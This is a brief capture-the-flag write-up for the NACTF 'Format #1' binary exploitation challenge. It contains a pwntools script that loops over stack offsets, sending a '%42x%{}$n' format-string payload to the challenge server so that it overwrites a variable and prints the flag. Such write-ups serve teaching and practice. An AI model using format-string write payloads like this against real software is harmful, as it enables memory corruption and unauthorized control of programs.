Format #1
Binary Exploitation - Points: 250
printf can do more than just read memory… can you change the variable?
Connect at
nc shell.2019.nactf.com 31560
The script now uses a format string to write the value 42 to different offsets and will print out the flag when it hits the passed pointer of num.
from pwn import *
for i in range(8,64):
r = remote('ingress.cluster.nactf.com', 31560)
r.sendline('%42x%{}$n'.format(i))
print r.recvall()